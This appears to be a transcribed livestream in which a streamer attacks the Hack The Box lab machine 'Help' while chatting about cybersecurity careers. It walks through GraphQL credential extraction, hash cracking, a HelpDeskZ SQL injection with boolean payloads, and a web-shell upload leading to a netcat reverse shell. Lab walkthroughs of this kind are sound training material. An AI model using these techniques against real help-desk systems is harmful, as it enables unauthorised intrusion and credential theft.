side. And then like the average master's degree is like probably double that, or like 40, 50, 60, $70,000. That's a lot of money, dude. This college is so expensive, and I hate it, dude. It's not even the best education either. I think certifications are the best education because it's, you know, you can get a CompTIA certification for, I don't know, I think it's like $400 for an exam, and then like, you know, maybe an extra $100 for like study material. So you're looking at like $500 for a certification. But the problem is, like, certifications don't guarantee, nothing guarantees you jobs, not even a college degree. You know what I mean? This feels incredibly hard to break into, by the way. Like, right now the job market's awful, but it's not just cybersecurity. That's the entire industry, like the entire economy right now. Dang it, it still can't find my shell that, oh no wonder why. It's not shell.php, it's shell.txt. Oh gosh, we waited all that time for nothing. No, yeah, of course it's not gonna find shell.php because shell.php doesn't exist because that's not what I upload. I upload shell.txt. So yeah, that's what I will say is it is really hard to break into the industry right now just because the job market sucks, straight up. And it's very unfortunate, but that's just how it is. This is how the economy is right now, you know. Hopefully the economy makes a recovery and jobs start flowing in and all this stuff, and you know, it's not so hard to get a job. Oh yeah, that Neo makes a good point. Do hack the box and try hack me. I would start with try hack me before hack the box for sure. Hack the box is a little harder than try hack me. Did you know they have Network Plus on Coursera cert for $49 a month? This actually doesn't seem too bad of a deal. I never really messed with Coursera. I usually do CBT Nuggets or IT Pro TV, but that's like $60 a month for those. Actually, they used to be like IT Pro TV used to be $40 a month, and that was a steal. But then they bumped their price up to $60, so it's like gross. But I do like IT Pro TV still. I do like the instructors there. Can I show you my Hackintosh lab video? You're talking me or Wiredog? Dude, it still can't find this, dude. I don't know what to do. Well, we're over. Well, we're not at the 2-hour mark yet. Man, I'm stuck. I don't know what else to try at this point. Yeah, search degrees don't matter. I mean, the skills matter, but certs can help prove your skills a little bit. You know what I mean? Call me crazy. I might just follow all the certs you've done on your page and see if I can do it. Yeah, that's not a bad idea. I mean, there's a reason why I have every cert that I have. You know what I mean? Like, it's not like I'm just getting certs for no reason, you know? I will say Linux Plus probably is the least important one. You just need to know how Linux works, but that's how I learned Linux was Linux Plus, you know? Lots of orgs have been eliminating the degree requirements. That is a fact. That is a fact. And that's how it should be too, because I'll tell you what. I mean, I have a bachelor's degree in cybersecurity, and I'm almost done with my master's degree. I got 2 more classes. I'll have my master's degree in about, I don't know, about a half year from now. I'll have my master's degree, and yeah, I think the certifications in Hack the Box and Try Hack Me has got me way more knowledgeable and skillful in this field than my degree ever will. But then again, my degree isn't a technical thing. My degree is in cybersecurity management policy. So I purposely went for a non-technical degree because I wanted to work on because I have really good technical skills, but I don't have the management policy skills. So that's why I did that. You know, I wanted to complement my non-technicals. I wanted to complement my technical skills with non-technical degree, basically. So I set myself up for on purpose like that. Let's look at. I'm gonna do guided mode, guys. I'm stuck. There's 3 ports open. We know that. What is the relative path for the graph query language instance running on port? The graph query language, dude. We're not even on the right thing. We're trying to exploit the wrong thing, dude. Oh my gosh. It's telling us to check out the graph query language instance running on port 3000. Did they give me a rabbit hole, bro? You're not supposed to do rabbit holes. Go to 3,000. Hi. Oh my gosh. Why did we not try this before? Alright, well, now we know we're in the right direction. We were on the wrong port. We were trying to exploit port 80 this whole time. I saw nothing on 3,000. I should have just navigated there. Lesson learned. Always check out the ports. Hi, Shiv. To get access, please find the credentials with given query. Please find the credentials with given query. What does that even mean, bro? How do I make a query to this? Slash query? Can I get slash query? Given query? Bro, I don't know what that means. What if we tried to Ferox this? Let's do hub.hackthebox slash 3000. See if that does anything, maybe? Do I know Derb? Yeah, I know Derb. Derb's a good guy. Nah, it's kidding. It's a fun. The tool's slow though. Well, that's what Ferox Buster does. Ferox Buster is like a faster version of Derb. Yeah, there is a lot of gatekeepers. A lot of gatekeepers in this field, man. That's what I hate. I hate those old people who are like, well, I got my degree and I had to do 20 years on the help desk before I got in cybersecurity, so you gotta have 20 years of help desk experience before you get in cybersecurity. And that's literally some people's logic, dude. It's awful. It's very bad. You have to do 5 years as help desk, you have to do 5 years of system administration, and then if you don't have that, screw you. But that is a way to break in the field, though. If you can take a tech job as soon as you possibly can. That's actually what I would recommend. You know, it's almost impossible to go straight into cybersecurity. Not impossible, people do it. But, you know, if you can get a help desk job, take the help desk job. And you might have to take a pay cut to do that. That's what I did when I joined the military to become a system administrator. I took a huge pay cut to go from working oil refineries where I was making pretty good money, pretty respectable living for a non-educated person. Or, well, I had a high school diploma, not a college degree. But I didn't know how to break in the field, so that's why I joined the military. But when I joined the military, dude, it was bad. I would say my first 2 years in the military, my first year and a half, I was struggling financially, dude. I mean, it was bad. It was incredibly bad because I had no money, man. I took a huge pay cut to join the military, but after I got a couple promotions under my belt, then I started getting to a point where I'm like, oh, I can actually save some money here. CH equals trash. Yeah, that's true. CH is would not recommend. Ten years experience and a PhD. That's bad, dude. Even I get emails all the time saying, we're looking for a pen tester. You look like you met the qualifications. And it's like, here's our requirements. Now look at the requirements. You have to have 8 years in pen testing. I'm like, 8 years in pen testing? Bro, like, that's crazy. Yeah, that's true. The CH is good if you want to work in the government. I actually had someone I went to tech school with in the military said he got declined because he didn't have a CEH. So if you want to work in the government, CEH is actually something you want to have. So in that way, it does help. And believe it or not, most of the jobs out there are government jobs. The government is the #1 employer. Like they hire a bunch of other companies. So CH in a way is kind of valuable. Yeah, for US. Yeah, US government. Bro, this is not working. I don't know what to do. I don't know how to figure out, oh, you know what? That's where I'm messing up. This... That's a fact. Being born in the US was a really big lucky break, you know. That for sure was really nice. I'm very thankful for that. What did guide mode ask for? I don't know. It just told me to check out port 3000, so I started checking out port 3000. But I'm about to go to the next step. Well, it's asking for an endpoint, which is that's what I'm trying to figure out. What is the relative path of the graph core language instance running on port 3000? I don't know, man. That's what I'm trying to figure out. That's why I'm fuzzing this. But I can't find anything. Hi, Shiv. So Shiv is a person, maybe? I don't know, man. I don't know, man. I'm just trying to... Yeah. So there's definitely something here, but... Man, what? I don't know how to figure out where the endpoint is. We're doing... Try and burp. That's probably... That might be the way. Initial access on this box has been a doozy, that's for sure. I don't know, man. trying to Ferox the directory right now, but it's not picking anything up. I've lost my nmap scan. Results. Let's just scan 3000 here. I can't believe that I can't find anything with Ferox Buzzer on port 3000. That's the problem. What if we got rid of the HTTP and then got rid of the slash, maybe? Nothing. I think it definitely needs the HTTP. This is probably my favorite song, guys. That this artist makes. This is where I got the Hacker's Cash intro music from. The name of the song is literally called Hackers, and that's why I like it even more. Oh, here we go. Node.js Express Framework. I don't even know that's right, dude. I think that map's wrong on that. See, this says, what is the relative path to the graph core language instance? I don't know how to follow the graph query language, dude. I don't know nothing about graph query language, dude. Not a thing. Graph query language. Let's see if Hattrich wrote about this. Oh, the GraphQL. I don't know why I thought GraphQL and graph query language is different. It's the same. Directory brute force attacks and GraphQL. Get query missing. Is it GraphQL? / API maybe? Is that the answer? That's right. Okay, we found GraphQL. The user data type has two fields, password and what? Bro, how do I figure that out? So GraphQL is the endpoint. We figured that out. Get query missing. Kidbo, thanks for stopping in. Glad to see you here. The reason why I'm laughing is because he says, "Hey, buddy, can you say what you're doing? I'm kind of lost here. A short brief will be okay." Bro, honestly, I don't even know what I'm doing. That's why I'm laughing. Bro, all I know is that we got a GraphQL. We got a GraphQL, which is graph query language. And I'm trying to figure out how to get some information out of here. That's why I Google GraphQL hat tricks. And this is just a little guide on how to get some information out of here. So I'm just going to, I did a /GraphQL. I'm like, okay, that gave me some information. And now I'm like, all right, well, let's try the next thing. You know what I mean? But honestly, man, I'm just figuring out as I go. I don't know much about GraphQL, to be honest with you. It's not a thing that I've exploited before. So this is all new to me, and I'm just figuring it out as I go. I mean, the guided mode is really helping me out here. We got the user data type has two fields, password and what. So I got to figure out the user data type. That's what I'm trying to do right here. But I don't know how to figure that out. Like, not a clue. Like, there's all these queries that you could do, and it's like, bro, what does this even mean? So if you're lost, don't feel bad because I am also lost. Normally, I kind of know what the heck I'm doing. Yo, Kidbo, thanks for the. Is it Kidbo or Kidboo? Is that O? Is that 0 an extra O? I appreciate you following. Thanks for the support. So yeah, we're just trying to figure out. The user data type has two fields, password and what? Username, maybe? Username. That's just a wild guess. Okay. We got to the next section. What is the email address of the user in the GraphQL database? How do I figure this out? Do I do like /username? I have no idea. The only reason why I knew it was username is because username goes with password a lot, but also if you do, it's just credentials. I don't know. Username was just a wild guess. Let's look at a hint for that last one. It's possible to query GraphQL for the schema and enumerate the database, or you can just guess it. Yeah, but I don't know how to enumerate GraphQL. I mean, I know how to enumerate SQL, but not GraphQL. What is the email address of the user in the GraphQL database? Read about the GraphQL syntax to query for objects. Universal query. So what do? I just do query username? I don't. Do I just type in this? Bro, I am so confused. I don't know where this goes. The tool GraphWolf is capable to detect which GraphQL engine is used in the server and then print some helpful information for the security auditor. Let's just copy this here. So this is to send queries. So maybe if we go here and then I just do well, maybe if we do a question mark here, maybe. Oh, here we go. Oh, nice. We figured it out. So GraphQL question mark and then query equals and then whatever we want to query. So what we queried was this. We just queried the schema, types, name, fields, name. And it gave us some actual information. So we got username, password. I thought I saw some real names in here. I guess not. What if we did fields? We got name, user, user. So we got user, username, password. So we can get a username and password out of this maybe? If we can query this correctly. Well, I know we can get a username and password if we query this correctly, because if you go back here, if we go back to the base, it says, "Hi Shiv, to get access, please find the credentials of given query." So we can get the username and password with a crafted query. So it looks like query equals I don't know how to do this. I'm gonna use ChatGPT here, honestly, to structure this. ChatGPT will help me out. Alright, so I'll show you what I'm doing here. So we're going to say I submitted this query. Submitted this query. I cannot spell. Well, I can't spell. My fingers type the wrong thing sometimes. I submitted this query and I got these results. And then we're just going to copy and paste all of this information here. And we're gonna say, how can I query query for all users and usernames with their passwords? See what happens. Alright, well this is a lot. I need to put this in a URL. This has got to be in a URL. It's got to be in a URL like this. So give it an example of what I just did. So it's got to be in a URL. Encoded URL. Thank you. It's even going to encode it for me. It doesn't have to encode it, but it doesn't have to be encoded because it encodes it automatically for us. But we will send this. Alright, well, let's just tell ChatGPT that. We don't worry about URL encoding. Encoding happens after I submit a query. I wish I can spell. Why does it keep giving me this? Like, I don't want this. I want it all in like one line. I don't know why it's not doing that for me. No. What are you doing? It has to be a one-liner. I don't know what ChatGPT's trying to do. Like, it's got to be a one-liner. There, thank you. Let's try that. Alright. Just give ChatGPT this error so I can work off of that. Oh, man, just give me a lot. Check for arguments for the user field. Okay, well, let's close out of this. Let's keep hat tricks open. Let's go close out of the ticket. We'll duplicate this because this error is going to come in handy. We're actually going to record what goes on. So we sent this. We sent this. Got this. Sent this. Got this. So we'll copy this. And then we're going to try everything ChatGPT just tells us to do. And then we're going to give it all the output, including the errors. This is going to be on my other monitor for now, but I have this open. Alright, so let's go back to ChatGPT here. Check for arguments. So copy this. Paste this. Data fields name. Okay, so that's some good information. That's not even an error. So I'm gonna put this in my notes again. So copy this. Got this. No. Sent this. Got this. And then we will copy this. Copy. Alrighty. Now let's go back to ChatGPT. Copy this, and we will paste this. Alright. Sent this. And then we got this. So this is an error here. That last one we got was not an error. Alright, now we will go back to ChatGPT, try the next thing down. This one I just sent. Admin. Yeah. Copy this. Paste this. All right, that's the actual real data there. So, dude, GraphQL is gross. This is really like. Does anybody like doing this? Who likes GraphQL? Can someone tell me that? Like, why did this GraphQL even get invented, bro? Like, I feel like this is so much more complicated than like a traditional API. You know what I mean? That's just my opinion. This is not simple. They say GraphQL is supposed to make things simple. I don't believe it does. But that's my hot take. Alright, now we need to go back to ChatGPT. We're on number 5. Oh, look at that. We actually got a password. Alright, that works. This, I don't even think we need, that worked. So right here, question mark query equals curly bracket user, curly bracket username, comma, password, and end the curly brackets. So that query gave us this username, help@helpme.com, and then a password of this. So let's copy that. That is exactly what we are looking for. All right, perfect. I'm going to put this in my notes on my other monitor here. So what's the name of this box? Help. Alice. Microsoft OneNote just crashed on me. That's wild. All right. So now, oh, it's because my disk is full. Oh my gosh. I need to get a new hard drive, guys. My disk is full. It's so full that I can't even write a simple one-liner in my notes. I need to definitely get a bigger hard drive. It's not even completely out of space. And I delete everything that I don't need. I delete things that I actually would like to keep around for the longest time, but I just delete it because I don't have the space for it. God bless GPT. Yeah, ChatGPT saved my life. I don't think I would ever figure that out. I mean, maybe with a lot of time, effort, and energy, but ChatGPT really shortens down the time figuring things out. 100%. All right, now let's go back over to help.htb/support. Now we should be able to log in actually. And now that we log in, we know that there's an authenticated SQL injection vulnerability here, because we're going to be authenticated after this in theory. I mean, I don't know. I'm assuming this is going to work. It did not work. Invalid username. What? Well, what do I do with this password then, dude? Well, that's just wild there. Maybe there's other users on the system. I don't know, man. List all possible types in their fields. Let's try that. Oh, alright. That's a lot more information. Maybe there's other users on the bot on this. You know what I mean? That's what I'm thinking. I'm thinking there's other users here with other passwords. So I think I just need to keep writing the stuff in my notes. And then let's look here. I think this is what gave us the username and password of it, just a standard username. Yeah. List all possible types in their fields. Name field's name. Query for the first user by ID if user field accepts an ID argument. Let's see if this works. That did not work. We're just going to give all this information to ChatGPT here. Let's go back to here. List all directives. All right. Let's continue on. List all directives. Fetch the schema description. Alright, that did not give us anything. That was an error. I think there's one more to try. Yeah, there is. One more. See if this one works. They gave us something. Wasn't an error. Alright, so we're going to copy all of that. And I'm going to go back to ChatGPT. And I'm going to say, why can't I? What else can I try to get other user names and passwords? Because if I go straight to You guys can't see what I'm typing. It says navigating to here gives me this. I get confused working on one monitor, guys. It's hard. It's rough. Gives me this. All right. The username and password I got from here doesn't seem to work anywhere. Are there other ways? Are there ways to find more users and usernames? See that? I'm gonna close out of this and burp. I need this. I might need burp later, but for now we're gonna close it. I got the same thing. Look for other queryable fields or types. This is annoying, man. We're making progress, though. I mean, maybe those creds do work somewhere. I just don't know where else to try them at. I'm sorry, I just refuse to believe that this is easier to understand than traditional APIs. I really refuse to believe it.
Access granted.
Mara Safar04, thanks for subscribing on YouTube. I appreciate you. Just focus. You don't need to prove nothing for us. You already had the OCP, but if you want to keep doing this machine, try harder. Oh yeah, we got time. I'm getting this box, man. We're gonna get it. We are gonna get it. Where was my ChatGPT? There we go. These credits are probably useful somewhere. I don't know. I think these credits definitely probably work somewhere else. Same stuff. Username helpme@helpme.com. Password. I don't know. That doesn't seem like it works though. Check for environmental variables exposure. That username and password's gotta go somewhere, right? I mean, what if that just gets me SSH? You know what I mean? Let's just try this then. SSH help.hackthebox. We can try. Nope. Yeah, yes. I don't want to log in as root. I want to do SSH shiv at help.hackthebox. Could be his SSH credits, could be user right away. Yeah, permission denied. That password doesn't work. Let's try it one more time here. Nah, didn't work. I didn't think it would. It was worth a shot. I just don't understand why help me. Hi Shiv, to get access, please find the credentials with given query. I mean, yeah, it's helpme@helpme.com is the email address it says for the username. And then for the password, it's like this random string of characters, but it doesn't seem. Oh, you know what? Maybe this is a hash. Oh, that's a hash, dude. That's what it is, bro. We gotta crack this. Hashes.com. We gotta crack this, I think. This is a hash, I think. That's where I'm messing up. We had the creds. I don't know why I didn't think about cracking it. Look at that. God help me, please. God help me, please. That is a name. That's the password. Perfect, dude. Alright, so let's try that again. We'll paste God help me please into here. So it's help me. I don't know why I didn't think about cracking that earlier, but better late than never, I guess. Alright, now we're in. Check that out. Alright, there is SQL injection here somewhere. So let's look up help desk authenticated SQL injection. Help desk Z exploits. There's authenticated SQL injection here. Authenticated SQL injection, unauthorized file download. Software after ticket submit allowed to download attachment by entering the following link. View ticket, blah, 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 blah. Steps to reproduce. And param. Enter valid ticket ID here. Alright, so all we gotta do is let's view a ticket. So let's go back over to here. We can close out this GraphQL stuff. We don't need that anymore. Let's close this. View tickets. We don't have any tickets. We gotta submit a ticket. Let's make a ticket.
Access granted.
The Cyber Guy, thanks for the follow over on Twitch. I appreciate you. We don't need an attachment. We just need a. We just need a valid ticket ID. So let's go to my tickets. There we go. Is this a ticket ID? View ticket number. Yeah, look. Tickets and tickets param equals 11. So that looks a lot like equals 2. Or the stream, D Cyber Guy. Thanks for stopping in. How you doing today? View ticket. Alright, well, let's just do this then. Entering a valid ID or parameter which is submitted ticket, adding a query at the end. Call the script with the base URL of your help desk C installation and put your submitted ticket, login data, email, password. Steps. Go to help desk submit ticket. Submit a ticket with a valid email. Important, we need password access. Add attachment to our ticket. Get the password from email. Run the script. Huh? Okay, well. Let's copy the script here. So what does it need? Python test.py. But how does it know what ticket number? Steps. Go to here. Submit a ticket. I think all I gotta do is just do this, dude. Let's do Python. I'm gonna assume it's X Python 2, but it's hard to tell. Flash support, and we need our username. And then we need our password. And this might work, maybe? I don't know, man. Last call. Maybe it's Python 3. No, it's Python 2. Session takes no arguments, one given. What? I'm running this exactly how you told me to run it. Python test.py. HTTP. Username and password. That's literally it. Oh man, that's wild. Alright. What's up, Redwood? How's it going, man? Switched up with a Thursday. Well, I started doing Thursdays now. I do Thursdays and Sundays now. I think this is my third Thursday, maybe. I didn't do a Thursday live stream last week because I had to do some stuff, but yeah. I'm trying to do every Thursday and every Sunday. Man, what the heck is going on here? We need password. Okay. Maybe our ticket got washed out of the system. My tickets. No, it's still there. Well, darn. I don't know why the script's not working here. Is there a CVE number attached to this? No, there's not. Wonder why there's not a CVE attached to this. Well, it says this is the steps to reproduce. So let's just do this. We'll just copy this. We might not even need this script. We could probably just manually exploit this without using this person's script, because their script doesn't seem like it's working. So we will do this. Now we just need to put a valid ticket ID here. I don't know if that means include the hashtag or not include the number symbol here. I don't know. So valid ticket ID here. Does it stay in parentheses? Assuming it stays in parentheses. I'm gonna copy this, put it in my notepad here, so I can repeat this Did anything happen? Let's open on burp. We're probably gonna need burp sweep for this.
Access granted.
Just fix it mobile computer repairs. Thanks for subscribing over on the YouTube channel. I appreciate you. Let's do log in to this. So we do help.hackthebox/support, and we will. That's not what I wanted. http://help.hackthebox/support. And we will log in with our username and password that we found. How did that not work? Oh, I gave it the wrong password, that's why. I gave it the password hash, not the actual password. That makes sense. That makes a lot of sense. Paste the password here, log in. Alright. Now we're on the same dashboard, so we want this to go through our burp, which it's already going through burp, but we want to go intercept, and we want to take this and paste this. So this is that query. So this is right here is what I'm doing from the exploit, and we're just we're gonna paste this here. We're gonna send this to repeater, and we're going to send this. See what happens. We didn't get any SQL errors. You know what we need to do, I think, is we need to try this one more time. Let's go back to here. Let's turn off intercept. Paste this again. Oh. Refresh the page. We need to paste this here. Is it 2/? It is. Weird. Alright, we need our valid ticket ID here. So, man, why does it keep doing this to me? I need to... My tickets. Now I need to paste this again. And then I gotta get this valid ticket ID. Maybe I need the pound symbol. I don't know. I don't know if I need that pound symbol or not. And this time we're going to intercept. And we're going to send this. Alright, let's go ahead and send this to repeater. James Taylor, thanks for stopping in. Glad to see you here. I'm glad you're enjoying the stream. Alright, so this is what we sent. I don't know. This seems weird. This isn't right, I don't think. Forward. Hopefully try to get rid of this maybe. Forward. I don't see nothing happening here. I did not mean to do this. Go back.
Access granted.
Verothius? Hopefully I'm saying that right. If not, feel free to correct me. Thanks for following over on Twitch. Appreciate you. Alright, what we need to do is... these steps aren't very... These are kind of hard. Go to this. Alright, submit a ticket. We did that. Add attachment to our ticket. Get the password from email. Run the script. I don't understand what the attachment has to do with anything. I'm so confused on this one, man. I am lost. I'm gonna go back to guided mode here. What is the email address of the user? Alright, I got that. We logged in just fine. There's gotta be an easier way to exploit this. This exploit DB instructions are not very good. What is the password? It's God help me, please. What is the domain name that the service or port redirects to when you visit by IP address? Oh, .htb. We figured that out. What's the relative path? /support. Figured that out a long time ago. What version of help desk is running on help? I don't know. Probably 10. Is it 102? If it's... The only reason why I know this is because I'm just... The reason why this might not work is because I might be trying to exploit the wrong version, but if this is the version, then this should work. But I just can't seem to make it work. This is why I turned into guided mode just now. What is the username that we can get a shell on as on help? Let's go ahead. There's at least 2 exploitable vulnerabilities in help desk 1.02. There is an authenticated SQL injection that will show you to read a SHA-1 hash from the database and crack it, allowing for SSH access. There's also an arbitrary file upload vulnerability which will allow you to upload a web shell and get execution that way. Either way, you'll end up with a shell as the same user. I've tried both these exploits, bro. There's authenticated SQL injection. There's gotta be a better way for this. I don't like this exploit DB. Arbitrary file upload.py unauthenticated shell upload. We've tried this. This doesn't work. Authenticated SQL injection probably works, but I don't know how to take advantage of this, dude. The script isn't working. Let's ask ChatGPT why this isn't working. Why is this script not working? Here is exploit.py. Cat exploit.py. Give ChatGPT all this information here. and hopefully it figures out why it's not working. That's not what I wanted to do. Remove the config parameter. Replace this session equals request. Mousepad exploit.py. Gotta find the session. One match, okay. Line 36. So we have to change line 36 to this. That was easy enough. We'll save that. Now let's run it. See what happens. Watch it just work. We didn't get an error. I'm on the way to try Hack the Box again. Nice, nice. It's a good exercise, man, for hacking skills. Honestly, I don't think there's a platform better out there. Maybe, but I like this platform a lot. Look at that, dude. Oh, never mind. I thought we got it. I saw a username and a password, but nothing. Your ticket has to include an attachment. Probably no attachments are found. Try to submit a ticket with an attachment. Okay, easy enough. We just got to go back to where we were and submit another ticket with an attachment. So we will just random stuff, apply shell.txt, because why not? 8D8NZ and submit that. Invalid image code, dang it. Once again, can't pass the captcha because I'm a machine. Alright, there we go. Let's try that again. See if we got it. We uploaded a ticket with an attachment. It doesn't say it just says with a attachment. It doesn't say a malicious attachment. It doesn't say an attachment has to be a certain type, a certain structure. It doesn't say any of that. It just says with attachment. So hopefully this just works and we get a username and password to SSH into the box. And that would be pretty cash money. Still nothing, dude. Why? I don't know what else to try. That's the exploit, dude. Like, that is the exploit. Like, I'm doing it to the letter. To the letter. I don't understand why that's not working. See, there's that. There's their attachment. I don't know, man. I'm gonna go right up on this one, man. I'm at a loss. This exploit is not well written. I'm sorry, whoever wrote this one. Who wrote this? Author, Marius Poplowski. Bad instructions. Bad instructions. So I want to check out a write-up, dude. Unfortunately, we gotta do it. We're running out of time. We only have an hour left, and we don't even have initial access yet, let alone a user flag. Let's read the official write-up walkthrough first, and then if this doesn't work, then we'll resort to other people's walkthroughs, but yeah. Authentication SQL injection. From a new, okay, let's upload a ticket to fetch the attachment URL. This can be scripted. When it doesn't work, am I always doing something wrong, or can it be on Hack the Box In? Sometimes I do it exactly and it still doesn't work. Generally speaking, by the way, Cypher, thanks for stopping in. Glad to see you in the chat. Generally speaking, if the box is running and like you can ping the box, you can port scan the box, you can navigate to like for example in my situation, I can get to, you know, where the vulnerability is, like on this dashboard here. If all this stuff is working and your exploit's not working, it's usually something you're doing. And sometimes the walkthroughs that other people make aren't very descriptive, and you miss something that they forgot to put in there because they don't put every single piece of information you need to know in those walkthroughs sometimes. So the key to success, if you're stuck and you're using a walkthrough, is check out multiple walkthroughs, because the piece you're missing is probably written in a different walkthrough. And if you try all the walkthroughs and you're still not getting it, I mean, it's probably something you're doing, but you could revert to machine, try it again and again and again, and then, but generally speaking, it's something that you're doing and it's not on Hack the Box In. But it could be on Hack the Box In too, but generally speaking, if you can ping it, you can port scan it, you can interact with the box, it's usually something you're doing. Hopefully that helps you. Like right now, I'm stuck right now. I'm reading this guy's walkthrough, or the official walkthrough, and this is just, man, this is a little more complex. This is a lot for an easy machine, if you ask me. Right click on the attachment and copy the link. Alright, let's go to my tickets. Hold on. From initial, okay. Submit a ticket and upload a ticket with an image. With an image as an attachment. Oh, it's gotta be an image? Oh, maybe that's where I'm messing up. No one told me that. No one said I had to be an image. Maybe the script will work once I upload a... Sorry, where did you get that walkthrough? It's the official Hack the Box walkthrough. You have to be a Hack the Box VIP member to get it.
Access granted.
I got a VIP Plus, but I think you have to be VIP at least. But definitely VIP Plus gets it, and then you can get it from there. Philip Zerk, thanks for subscribing to the YouTube channel. I appreciate you. So this is the official write-up, but you don't need, I mean, you can see all these other write-ups here. If you just Google write-up, you can get all these for free. But the official write-up, you have to be a VIP. Which, honestly, the official write-ups are actually the worst write-ups, to be honest with you. In my opinion. The best write-ups are actually the ones that the other people make. So, don't think that you have to pay money to get a good write-up, because, quite frankly, the official Hack the Box write-ups are generally not as good as, you know, what other people do. Anyways, what I'm doing, oh yeah, we need to upload a new ticket, submit a ticket. We're gonna do it with an image this time. I did not know it needed to be an image. This guy used a JPEG. Why can't? Let's go to downloads maybe. Do I have a JPEG in here somewhere? I do. From IRT. From oh, I hate captchas so much, dude. IRT JPEG. Open. Alright, so we uploaded the JPEG. Let's try this script again. Maybe that's all I needed. You know, I had an attachment, but that guy's exploit, the guy that wrote this script, did not say it had to be an image attachment. But the official write-up says it has to be an image attachment. So that's where we got that information from. So that's where walkthroughs kind of come in handy, man, because sometimes you just, there's like, you get stuck and you're like, well, I'm doing it exactly as the exploit says, and yeah, this didn't work. This guy's exploit's very whack. This exploit does not work. Alright, well, let's go back to our official write-up here. Go to the view tickets and open the ticket. Alright. Right click on the attachment and copy the link. Request it. Okay, yep. So what we need to do is we need to navigate to my tickets, open the ticket, which is the one right here, and we will right click, copy link. We'll open up a new tab. We will paste this. Before we push enter on this, we have to push intercept, and we will intercept this request. And we will intercept the request. Let's go intercept an example ticket. Looks like this. Check if it's vulnerable to SQL injection. So we just do and one. So he does a SQL injection, 1 equals dash dash dash. Sending this results to true condition, which, okay, so we just need to do and 1 equals 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 right here. So what we want to do is go back to burp, send this to repeater, and we want to do and 1. Oh man, I forget already. And 1 equals 1. How many dashes? 1, 2, 3 dashes. And 1 equals 1 and 3 dashes. 1, 2, 3. And let's go ahead and send this. If we get true, then that means it worked. We did not get true. I think the reason why is because we got a URL and code this. Let's do right click. Well, I don't know how to URL. I think it's Control U, right? Yeah, I don't know how to URL code by right clicking it. Let's try that. Bad request. Well, that didn't. Let's go back. I did exactly what you told me to do. Sending this results in the true condition, which returns the image, but changing it to 1 equals 2 doesn't, because it evaluates a false. This confirms a SQL injection vulnerability. Well, let's just go back to here. Let's turn intercept off. And let's go back to here. This should take us to the image. Yeah, it took us to the image. Alright. Now what if we do space and 1 equals 1 and 3 dashes. Well, maybe it's dash dash space dash. If this says true, that just still worked. What if we do 1 equals 2? This should work. Or break it, yeah. Okay. Alright, we're on the right track here. We we need to do, where's my repeater? That's what I messed up. I need to do 1 equals 1 dash dash space dash. So if I send this, I should get a true. Bad request. I still got a bad request from that, huh? Let's do control U to URL encode all this. This should give it. There we go. That worked. Look at that. We got the image. This is the image data. That's exactly what we wanted. Now, if we change this 1, we change this 1 to a 2, we should get a break. Okay. Yeah, I think we're on the right track here. We confirmed the SQL injection vulnerability. Alright, now we gotta actually exploit it. So let's go back to the right up here. Let's check if the username is admin. This query returns attached, which means it's true in case the username wasn't out, for example. If results equal, okay, alright. That's gonna be scripted. Copy your cookies from your burp into the script, then run it. The script checks the hash character by character. If a character is found, the count increment and moves to the next one. We just need to do this script right here. Copy this. And we would do nano exploit, well, remove exploit.py. Clear this out, nano exploit.py, and we will do this, and that is not the right. We need to use ChatGPT for this to get us to the right. Take this Python script and give me the correct indentation. Alright, so we got the correct indentation now. Alright, so now what we need to do is we need to modify this a little bit. So first of all, we need to make sure that this IP address is correct, and we don't even need to do that. We just need to do help.htb/support. Okay, easy enough. And then now we need to change the PHP session ID. So let's go back over to my burp. The PHP session ID, I'm not even seeing that. Oh, here it is. So we copy this because this is going to be unique to me. And we will paste that right here. And then now, oh, that's not what I wanted to paste. What the heck just happened? I wanted to copy this. There we go. And then we need to grab our user hash, which is this. And we will copy that. Go back over to my file here. And we will delete all this. It's going to take a second. It'd probably be quicker just to delete the entire line with this will work. So the user hash is this. Mine looks a little different than theirs. Theirs was like base 64 encoded. Mine's not. But let's just run python 3 exploit.py. It's python 2 exploit.py. K is not defined. Nano exploit.py. What do you mean K is not? Oh. Try that again. Password A. That's not the password. There's no way that's the password hash. Oh, I see. Copy your cookies from burp into the script, then run it. The script checks for the hash. Let's go back to burp. I think I need to change the ID. View tickets. Well darn. Let's do view tickets and action. There we go. So I need to take this. So what I'm doing here is I'm copying from view tickets all the way to equals 15. Because honestly, I could probably just change their numbers to 13 and 15. Yeah, see? If I could probably just do this. 13 and 15. That'll probably work. If not, we can copy paste the whole thing, but I think that's the way. Nope, that's not the way. It's still a bunch of A's. Oops. NeoFetch, thanks for hanging out. Thanks for watching. Good night, sleep well, and I'll catch you later. Thanks for the support. Take care. Alright, now we need to... This is rough, man. This is almost like a medium difficulty box in my opinion. If you ask me. Let's see if that works. I might have broke it. Looks like I broke it, guys. This is like pretty broken. I'm not sure how you're supposed to figure this out by yourself. Because that exploit was kind of whack. The one on exploit DB. This one's hard. Is this even working anymore, bro? I think it's dead. He's dead, Jim. Well, darn. Guys, we're running out of time. Even with the write-up I'm struggling. Even with the write-up I'm struggling, dude. This can be scripted. Well, let's go grab a different write-up. Let's grab Snow Scans right up here and see what he's saying here. We tried this exploit. How did he get this to work? Oh, that's why. Because he's got to make sure that you're... So, the reason why that exploit wasn't working for me because my time wasn't synced with the server, bro. The time has to be synced with the server. Did I change my time just now? I don't even know if I just changed my time or not. I shouldn't have deleted this. Arbitrary file upload. That's what we did earlier. And it just was not working for us. We'll try again now that we got our clock synced with the server. Nano exploit 2.py. See if we can find out. We exploit 2.py help.tickets. So this is correct. But we need to upload this shell.php. Seems that some extensions are blacklisted and whitelisted on the server, but it looks like as the source code on GitHub, we notice that even when we get an error message, there's no code that deletes the invalid file. The file is still saved on a server, even if we get an error message. Oh, nice. To run the exploit, we just give the exploit, we just give it the upload location. Once the script hits the right file name. Okay. Easy enough, yeah. So all we have to do is upload a shell.php and then we're good. And this will work. What's up? Is it Chaos? I hope I'm saying your name correctly. Thanks for stopping. Glad to see you here. I'm not entirely sure what you're saying. I'm gonna use DMA board to cheat on R6. Huh? Are you talking about Rainbow Six? Is that what that is? Oh. Wait, why would you cheat? Don't cheat. There's no honor in cheating. No glory. Let's see here. Let's submit a ticket. General. Next. Priority. Subject doesn't matter. This doesn't matter. Browse. We want to do shell.php, but we gotta change our file name. So change directory /home Kali downloads. Move shell.txt to shell.php. Change that back. And we will go back to uploading this. Shell.php. Open. And we will 6DNSI submit. File's not allowed, but he said we can ignore that. So now if we just run this, this should work. But I gotta upload, I gotta start listening. It worked, but I forgot to sort of netcat listener. Netcat-LMVP 443. Let's try that one more time. Hey, it worked. What changed? Why did it work this time? I'm not sure why it worked this time. Oh, because I uploaded 